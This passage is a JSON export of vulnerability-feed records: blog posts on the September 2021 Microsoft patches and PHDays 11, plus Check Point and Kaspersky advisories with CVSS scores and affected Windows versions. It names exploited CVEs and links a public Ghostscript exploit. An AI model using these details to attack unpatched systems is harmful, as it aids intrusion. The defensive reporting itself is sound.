\nswordoke[.]com** \n** \n \n\n\n \n\n\nThe post [New spear phishing campaign targets Russian dissidents](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T18:02:48", "type": "malwarebytes", "title": "New spear phishing campaign targets Russian dissidents", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444"], "modified": "2022-03-29T18:02:48", "id": "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. "This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network."\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn't released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": "AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-11T01:56:16", "description": "Hello everyone! In this episode, I want to talk about the Positive Hack Days 11 conference, which took place on May 18 and 19 in Moscow. As usual, I want to express my personal opinion about this event.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239091>\n\nAs I did last year, I want to start talking about this conference with a few words about the sanctions. US sanctions against Positive Technologies, the organizers of Positive Hack Days, were introduced a year ago. At that time it seemed very serious and extraordinary. But today, when our country has become the most sanctioned country in the world, those sanctions against Positive Technologies seem very ordinary and unimportant. In fact, it even seems to benefit the company somehow.\n\n## Positive Technologies\n\nAt the end of last year, Positive Technologies became a public company with a strong focus on the domestic market and the market of friendly countries. The financial results are very impressive. The company's marketing is better than ever, especially everything related to video production. And, of course, their products are in even greater demand, because Western vendors have left the Russian market.\n\n## PHDays 11\n\nAs for the event, it is still the most important information security conference in Russia. In fact it was the most visited PHDays. 10,000+ guests at the Moscow World Trade Center, 130,000+ viewers of online broadcasts. I was only on the second day, when it was not as crowded as the first day of the conference. The atmosphere at the event was not the same as at a regular conference. It was more like a nightclub. Subdued lights, music, a lot of screens and all sorts of lighting effects. Very unusual.\n\n## The Standoff\n\nThe main show of the conference is the CTF competition of hackers and blue teams, The Standoff. The toy city, which displays the infrastructure of the virtual state of F, has become really huge. Entire sectors of the economy were represented there: metallurgy, electric power industry, oil industry, transport, banking system, housing management. etc. All this is interconnected. An attack on one object can cause a butterfly effect that affects the entire state. Very impressive!\n\n## Talks\n\nThe PHDays 11 program included about 100 talks, which were attended by more than 250 speakers. One of them was me. It makes no sense to list all the talks, but logically I would highlight out 3 of them.\n\n 1. Sergey Golovanov "[01111111day](<https://www.youtube.com/watch?v=p6-4Ky7uy_E>)**"** ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). He spoke about the attacks on Russian organisations after February 23rd. To summarize all that has been said, the number of attacks has become much greater. The source of the attacks is clear. Most of the attacks were simple and it was hacktivism, but they get more complicated with time. The main attacks are DDoS and penetration into the infrastructure for further data theft and destruction. Phishing is one of the commonly used penetration channels.\n 2. Alexander Goncharov "[CVE-2021-40444: why it is important](<https://www.youtube.com/watch?v=knCqmDoELjM>)" ([rus](<https://www.youtube.com/watch?v=8e-VRSzRHVg>)). Microsoft MSHTML Remote Code Execution Vulnerability. This is not the newest vulnerability, one of many. But in fact, it continues to be actively exploited, and mainly through phishing. Why? Since users are susceptible to phishing, hosts are not updated and hardened (disabling ActiveX, preventing office applications from creating child processes). And all this, of course, needs to be implemented in organizations. But one of the interesting questions is: can we now trust vendor updates that fix vulnerabilities? Alexander replied that we can, because enterprise IT vendors like Microsoft will not disable anything in terms of functionality. Simply because it will be a blow to their reputation.\n 3. And my presentation was just about this topic of trust. "[The new reality of information security and vulnerability management](<https://www.youtube.com/watch?v=phL8ClOLpqo>)" ([rus](<https://www.youtube.com/watch?v=XbAxuikX_eE>)). You can watch the video in my YouTube channel in Russian and with simultaneous translation. Simultaneous translation is difficult to do, especially in the fast track, so I will also make an extended English version of this report for [VMconf 22](<https://vmconf.pw/>). By the way, you can also submit a video about Vulnerability Management there if you want. So what was my report about. The new reality of information security (TNRoIS) began in February 2022. In this new reality, global vendors and open source software are less trusted than before. What was only recently viewed as a competitive product or service, has become a means of pressure, a Trojan horse, a threat to corporate information security. The new reality sets new requirements for key corporate processes, including the choice of IT products and information security solutions, security analysis, and update management. The forced de-Westernization of the IT infrastructure of Russian companies will not happen overnight. This is a long and difficult process. For example, is it true that by 2025 there will be no Microsoft software in Russian companies and everything will work on Russian Linux distributions? Now it seems too ambitious. Most likely we will see some kind of hybrid mode with a complex process of supporting unstable Western IT solutions and a simplified process for stable, mainly Russian IT solutions. Of course, it will be much more difficult than it was before, but there is a challenge in these difficulties. The problems faced by the Russian organizations in extreme form are relevant to much of the world, which means that certain terminology, approaches, and solutions can be successfully exported. \n\n## What could be better on PHDays 11?\n\nWell, there were few speeches about Vulnerability Management. For my taste. There was my presentation, there were a couple of speeches about specific vulnerabilities and rootkits, there was a [basic interview about Vulnerability Management](<https://www.youtube.com/watch?v=Scod5yQiKtM>) ([rus](<https://www.youtube.com/watch?v=Cgbq1qG_CZQ>)) and an interview about [MaxPatrol O2](<https://www.youtube.com/watch?v=hCSK0wi-KRU>) ([rus](<https://www.youtube.com/watch?v=SAt_gedhXw8>)). But it was very fragmented. It seems to me that the main conference of the leading Russian Vulnerability Management vendor should have a session or maybe even a track about Vulnerability Management. At least 2-3 hours. It would be nice to have a program that would resemble [Qualys QSC](<https://avleonov.com/2021/12/06/qsc21-vmdr-training-and-exam/>). After all, they talk about VM all day, why is it not possible on PHDays? Ideally, if there would be 80% about interesting practical cases and processes and 20% about how to solve them using Positive Technologies products (as a demonstration). That would be really cool and that would be right.\n\nIt may sound silly, but I missed bag chairs and sofas. There were far fewer of them. In past years, I liked to sit on them, relax and talk with colleagues. This time all the conversations were on the feet and it was not very convenient.\n\nIt seems like PHDays needs more space. There were practically no seats left in the halls. The fast track where I performed was in a tiny hall, which is not so easy to find. The organizers said that it did not happen on purpose. The schedule was changed at the last moment and the Fast Track had to be moved from a more convenient place. It's a bit sad, but the fact that full-length reports are a priority is right. And in our post-COVID time, the most important thing is video broadcasting, and it was at a very high level. My presentation went well, the audience was friendly, there were some very interesting questions.\n\nMany thanks to the organizers and participants. Until the next PHDays!", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T00:46:58", "type": "avleonov", "title": "PHDays 11: towards the Independence Era", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-11T00:46:58", "id": "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "href": "https://avleonov.com/2022/06/11/phdays-11-towards-the-independence-era/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-38639)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38639"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:03", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-36975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0550", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:00", "description": "A remote code execution vulnerability exists in Microsoft Open Management Infrastructure. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Open Management Infrastructure Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-21T00:00:00", "id": "CPAI-2021-0684", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-05-27T14:56:59", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, cause denial of service, spoof user interface, execute arbitrary code.\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38635](<https://nvd.nist.gov/vuln/detail/CVE-2021-38635>) \n[CVE-2021-36962](<https://nvd.nist.gov/vuln/detail/CVE-2021-36962>) \n[CVE-2021-38628](<https://nvd.nist.gov/vuln/detail/CVE-2021-38628>) \n[CVE-2021-36961](<https://nvd.nist.gov/vuln/detail/CVE-2021-36961>) \n[CVE-2021-38671](<https://nvd.nist.gov/vuln/detail/CVE-2021-38671>) \n[CVE-2021-26435](<https://nvd.nist.gov/vuln/detail/CVE-2021-26435>) \n[CVE-2021-38630](<https://nvd.nist.gov/vuln/detail/CVE-2021-38630>) \n[CVE-2021-36969](<https://nvd.nist.gov/vuln/detail/CVE-2021-36969>) \n[CVE-2021-36955](<https://nvd.nist.gov/vuln/detail/CVE-2021-36955>) \n[CVE-2021-38638](<https://nvd.nist.gov/vuln/detail/CVE-2021-38638>) \n[CVE-2021-36964](<https://nvd.nist.gov/vuln/detail/CVE-2021-36964>) \n[CVE-2021-38629](<https://nvd.nist.gov/vuln/detail/CVE-2021-38629>) \n[CVE-2021-40447](<https://nvd.nist.gov/vuln/detail/CVE-2021-40447>) \n[CVE-2021-38639](<https://nvd.nist.gov/vuln/detail/CVE-2021-38639>) \n[CVE-2021-36959](<https://nvd.nist.gov/vuln/detail/CVE-2021-36959>) \n[CVE-2021-38667](<https://nvd.nist.gov/vuln/detail/CVE-2021-38667>) \n[CVE-2021-38626](<https://nvd.nist.gov/vuln/detail/CVE-2021-38626>) \n[CVE-2021-38636](<https://nvd.nist.gov/vuln/detail/CVE-2021-38636>) \n[CVE-2021-36960](<https://nvd.nist.gov/vuln/detail/CVE-2021-36960>) \n[CVE-2021-36965](<https://nvd.nist.gov/vuln/detail/CVE-2021-36965>) \n[CVE-2021-36968](<https://nvd.nist.gov/vuln/detail/CVE-2021-36968>) \n[CVE-2021-36963](<https://nvd.nist.gov/vuln/detail/CVE-2021-36963>) \n[CVE-2021-38625](<https://nvd.nist.gov/vuln/detail/CVE-2021-38625>) \n[CVE-2021-38633](<https://nvd.nist.gov/vuln/detail/CVE-2021-38633>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>) \n[5005615](<http://support.microsoft.com/kb/5005615>) \n[5005618](<http://support.microsoft.com/kb/5005618>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12289 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36969", "CVE-2021-38625", "CVE-2021-38626", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-16T00:00:00", "id": "KLA12289", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12289/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:56:57", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, cause denial of service, bypass security restrictions, execute arbitrary code, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2016 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nHEVC Video Extensions \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36973](<https://nvd.nist.gov/vuln/detail/CVE-2021-36973>) \n[CVE-2021-38635](<https://nvd.nist.gov/vuln/detail/CVE-2021-38635>) \n[CVE-2021-36962](<https://nvd.nist.gov/vuln/detail/CVE-2021-36962>) \n[CVE-2021-38628](<https://nvd.nist.gov/vuln/detail/CVE-2021-38628>) \n[CVE-2021-36961](<https://nvd.nist.gov/vuln/detail/CVE-2021-36961>) \n[CVE-2021-38638](<https://nvd.nist.gov/vuln/detail/CVE-2021-38638>) \n[CVE-2021-36964](<https://nvd.nist.gov/vuln/detail/CVE-2021-36964>) \n[CVE-2021-38632](<https://nvd.nist.gov/vuln/detail/CVE-2021-38632>) 